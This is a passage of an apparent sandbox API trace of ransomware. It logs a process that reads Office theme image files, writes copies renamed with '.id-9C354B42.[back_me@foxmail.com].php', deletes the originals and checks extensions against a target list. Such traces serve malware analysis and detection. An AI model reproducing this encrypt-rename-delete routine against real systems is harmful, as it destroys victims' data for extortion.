lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.102] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.120] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=19563) returned 1 [0048.120] CloseHandle (hObject=0x194) returned 1 [0048.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20 [0048.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.121] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.121] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.121] GetLastError () returned 0x0 [0048.121] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x4c6b, lpOverlapped=0x0) returned 1 [0048.143] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x4c70, lpOverlapped=0x0) returned 1 [0048.144] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.144] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.144] SetEndOfFile (hFile=0x20c) returned 1 [0048.144] CloseHandle (hObject=0x20c) returned 1 [0048.144] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.144] SetEndOfFile (hFile=0x194) returned 1 [0048.145] CloseHandle (hObject=0x194) returned 1 [0048.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.146] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.146] lstrlenW (lpString=".doc") returned 4 [0048.146] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.146] lstrlenW (lpString=".docx") returned 5 [0048.146] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.146] lstrlenW (lpString=".pdf") returned 4 [0048.146] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.146] lstrlenW (lpString=".xls") returned 4 [0048.146] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.146] lstrlenW (lpString=".xlsx") returned 5 [0048.146] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.146] lstrlenW (lpString=".ppt") returned 4 [0048.146] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.146] lstrlenW (lpString=".zip") returned 4 [0048.146] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.146] lstrlenW (lpString=".rar") returned 4 [0048.146] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.146] lstrlenW (lpString=".bz2") returned 4 [0048.146] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.146] lstrlenW (lpString=".7z") returned 3 [0048.146] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".dbf") returned 4 [0048.147] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".1cd") returned 4 [0048.147] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".jpg") returned 4 [0048.147] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".doc") returned 4 [0048.147] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString=".docx") returned 5 [0048.147] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.147] lstrlenW (lpString=".pdf") returned 4 [0048.147] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString=".xls") returned 4 [0048.147] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.147] lstrlenW (lpString=".xlsx") returned 5 [0048.147] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.147] lstrlenW (lpString=".ppt") returned 4 [0048.147] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".zip") returned 4 [0048.147] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.147] lstrlenW (lpString=".rar") returned 4 [0048.147] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.147] lstrlenW (lpString=".bz2") returned 4 [0048.147] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.147] lstrlenW (lpString=".7z") returned 3 [0048.147] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.147] lstrlenW (lpString=".dbf") returned 4 [0048.148] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.148] lstrlenW (lpString=".1cd") returned 4 [0048.148] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0048.148] lstrlenW (lpString=".jpg") returned 4 [0048.148] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.148] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.148] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.148] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=3970) returned 1 [0048.148] CloseHandle (hObject=0x194) returned 1 [0048.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 0x20 [0048.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.149] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.149] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.149] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.419] GetLastError () returned 0x0 [0048.420] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xf82, lpOverlapped=0x0) returned 1 [0048.421] WriteFile (in: hFile=0x21c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf90, lpOverlapped=0x0) returned 1 [0048.422] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.422] WriteFile (in: hFile=0x21c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.422] SetEndOfFile (hFile=0x21c) returned 1 [0048.422] CloseHandle (hObject=0x21c) returned 1 [0048.423] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.423] SetEndOfFile (hFile=0x194) returned 1 [0048.423] CloseHandle (hObject=0x194) returned 1 [0048.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.424] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1 [0048.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.424] lstrlenW (lpString=".doc") returned 4 [0048.424] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.424] lstrlenW (lpString=".docx") returned 5 [0048.424] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.424] lstrlenW (lpString=".pdf") returned 4 [0048.424] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.424] lstrlenW (lpString=".xls") returned 4 [0048.424] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.424] lstrlenW (lpString=".xlsx") returned 5 [0048.424] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.424] lstrlenW (lpString=".ppt") returned 4 [0048.425] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString=".zip") returned 4 [0048.425] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString=".rar") returned 4 [0048.425] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString=".bz2") returned 4 [0048.425] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.425] lstrlenW (lpString=".7z") returned 3 [0048.425] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString=".dbf") returned 4 [0048.425] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString=".1cd") returned 4 [0048.425] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString=".jpg") returned 4 [0048.425] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.425] lstrlenW (lpString=".doc") returned 4 [0048.425] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.425] lstrlenW (lpString=".docx") returned 5 [0048.425] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.425] lstrlenW (lpString=".pdf") returned 4 [0048.425] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString=".xls") returned 4 [0048.425] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.425] lstrlenW (lpString=".xlsx") returned 5 [0048.425] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.425] lstrlenW (lpString=".ppt") returned 4 [0048.426] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.426] lstrlenW (lpString=".zip") returned 4 [0048.426] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.426] lstrlenW (lpString=".rar") returned 4 [0048.426] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.426] lstrlenW (lpString=".bz2") returned 4 [0048.426] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.426] lstrlenW (lpString=".7z") returned 3 [0048.426] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.426] lstrlenW (lpString=".dbf") returned 4 [0048.426] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.426] lstrlenW (lpString=".1cd") returned 4 [0048.426] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.426] lstrlenW (lpString=".jpg") returned 4 [0048.426] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.426] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.426] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.427] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=34163) returned 1 [0048.427] CloseHandle (hObject=0x194) returned 1 [0048.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20 [0048.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.427] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.427] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.428] GetLastError () returned 0x0 [0048.428] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x8573, lpOverlapped=0x0) returned 1 [0048.430] WriteFile (in: hFile=0x21c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x8580, lpOverlapped=0x0) returned 1 [0048.431] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.431] WriteFile (in: hFile=0x21c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.431] SetEndOfFile (hFile=0x21c) returned 1 [0048.431] CloseHandle (hObject=0x21c) returned 1 [0048.432] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.432] SetEndOfFile (hFile=0x194) returned 1 [0048.435] CloseHandle (hObject=0x194) returned 1 [0048.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.435] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0048.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.435] lstrlenW (lpString=".doc") returned 4 [0048.435] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.435] lstrlenW (lpString=".docx") returned 5 [0048.435] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.436] lstrlenW (lpString=".pdf") returned 4 [0048.436] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString=".xls") returned 4 [0048.436] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.436] lstrlenW (lpString=".xlsx") returned 5 [0048.436] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.436] lstrlenW (lpString=".ppt") returned 4 [0048.436] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString=".zip") returned 4 [0048.436] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.436] lstrlenW (lpString=".rar") returned 4 [0048.436] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.436] lstrlenW (lpString=".bz2") returned 4 [0048.436] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString=".7z") returned 3 [0048.436] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString=".dbf") returned 4 [0048.436] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString=".1cd") returned 4 [0048.436] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString=".jpg") returned 4 [0048.436] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.436] lstrlenW (lpString=".doc") returned 4 [0048.436] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.436] lstrlenW (lpString=".docx") returned 5 [0048.436] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.437] lstrlenW (lpString=".pdf") returned 4 [0048.437] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.437] lstrlenW (lpString=".xls") returned 4 [0048.437] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.437] lstrlenW (lpString=".xlsx") returned 5 [0048.437] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.437] lstrlenW (lpString=".ppt") returned 4 [0048.437] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.437] lstrlenW (lpString=".zip") returned 4 [0048.437] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.437] lstrlenW (lpString=".rar") returned 4 [0048.437] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.437] lstrlenW (lpString=".bz2") returned 4 [0048.437] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.437] lstrlenW (lpString=".7z") returned 3 [0048.437] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.437] lstrlenW (lpString=".dbf") returned 4 [0048.437] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.437] lstrlenW (lpString=".1cd") returned 4 [0048.437] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0048.437] lstrlenW (lpString=".jpg") returned 4 [0048.437] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.437] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.437] lstrlenW 